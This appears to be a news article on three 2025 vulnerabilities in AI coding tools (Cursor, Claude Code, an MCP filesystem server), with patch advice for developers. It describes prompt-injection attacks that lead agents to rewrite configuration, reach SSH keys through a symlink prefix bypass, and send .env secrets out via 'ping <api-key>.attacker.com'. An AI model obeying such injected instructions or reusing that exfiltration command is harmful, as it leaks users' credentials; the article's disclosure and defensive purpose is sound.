Three critical security vulnerabilities in widely-used AI coding tools—Cursor, Claude Code, and Anthropic’s MCP server—were disclosed between May and August 2025, exposing millions of developers to remote code execution, arbitrary file access, and data exfiltration attacks. With 20 million GitHub Copilot users and 82% of developers using AI assistants daily, these tools have become critical infrastructure. The CVEs highlight a troubling reality: AI tools promising productivity gains are introducing new attack vectors faster than the industry can secure them.
The Three CVEs That Broke AI Coding Security
CVE-2025-54135 (CVSS 8.6) exploits Cursor’s Model Context Protocol auto-start functionality. An attacker crafts a malicious prompt in an external service like Slack. When Cursor’s AI reads the prompt via its MCP integration, it modifies the ~/.cursor/mcp.json configuration without user approval and executes malicious commands immediately. Disclosed July 7 and fixed in Cursor 1.3.9, the patch now requires approval for MCP changes—friction that should have existed from the start.
CVE-2025-53109 (CVSS 8.4) targets Anthropic’s Filesystem MCP Server through symlink manipulation. The attack exploits naive prefix matching: an attacker creates /private/tmp/allow_dir_evil to bypass /private/tmp/allow_dir validation, then places a symlink pointing to SSH keys or credentials. Flawed error handling grants full filesystem access. Fixed in npm 2025.7.1, this exposed inadequate MCP sandboxing.
CVE-2025-55284 (CVSS 7.1) enabled data exfiltration from Claude Code via DNS. Hidden prompts in analyzed files inject commands reading .env files and exfiltrating data via ping <api-key>.attacker.com. Claude’s permissive allowlist didn’t require confirmation for network commands. Fixed in 11 days (May 26-June 6) with stricter allowlists and confirmation prompts.
The Security-Productivity Paradox
These vulnerabilities resulted from design choices prioritizing user experience over security. Cursor allowed file writes without confirmation. Claude Code’s broad allowlist reduced friction. Anthropic’s MCP used simpler validation. The pattern: vendors optimized for speed, assuming AI wouldn’t be weaponized against users.
Productivity claims don’t hold up. While vendors tout 51% gains, METR found developers 19% slower with AI due to review overhead. AI-assisted developers produce 3-4x more code but 10x more security issues. By June 2025, AI code introduced 10,000+ new security findings monthly—a 10x increase from December 2024. Forty-five percent of AI-generated code contains exploitable flaws, and developers using AI expose credentials twice as often.
Worse, 80% of developers incorrectly believe AI code is more secure. When trust replaces manual review, the industry scales risk with output.
Prompt Injection: The Unsolved Problem
All three CVEs exploited prompt injection—attackers embedding malicious instructions in AI-processed content. Traditional input validation fails because LLMs can’t distinguish between legitimate instructions and attacks hidden in code comments or files. MCP amplifies the risk by giving AI tools code execution capabilities and connecting them to external data sources. Each MCP server is a new attack surface.
April 2025 security analyses identified outstanding MCP issues: chainable tool permissions for file exfiltration, lookalike tools replacing trusted ones, and OAuth implementations conflicting with enterprise practices. The MCP spec is evolving, meaning developers run production tools on a security-incomplete protocol.
What Developers Must Do Now
Update immediately: Cursor 1.3.9+, Claude Code 1.0.4+, MCP Server 2025.7.1. Check ~/.cursor/mcp.json—remove untrusted servers. Review all AI suggestions, especially network commands and file operations. Never store credentials in AI-accessible files—use environment variables. Be suspicious of ping, curl, or DNS lookups appearing out of context.
For teams, mandate AI AppSec alongside AI coding tools. Implement secret scanning and code review policies that don’t blindly trust AI. Legit Security warns: “If you’re mandating AI coding, you must mandate AI AppSec in parallel. Otherwise, you’re scaling risk at the same pace as productivity.”
This Is Just the Beginning
AI coding tools are now high-value targets. Expect more CVEs. Vendors responded responsibly—fast patches, auto-updates—but prompt injection remains unsolved. Regulatory attention is coming from the EU AI Act and SEC disclosure rules. The consensus: use AI tools, but treat them like supply chain components. Vet them. Monitor them. Update them. Never trust them blindly. The choice isn’t between productivity and security—it’s between managed risk and blind faith in systems never designed to be trustworthy.





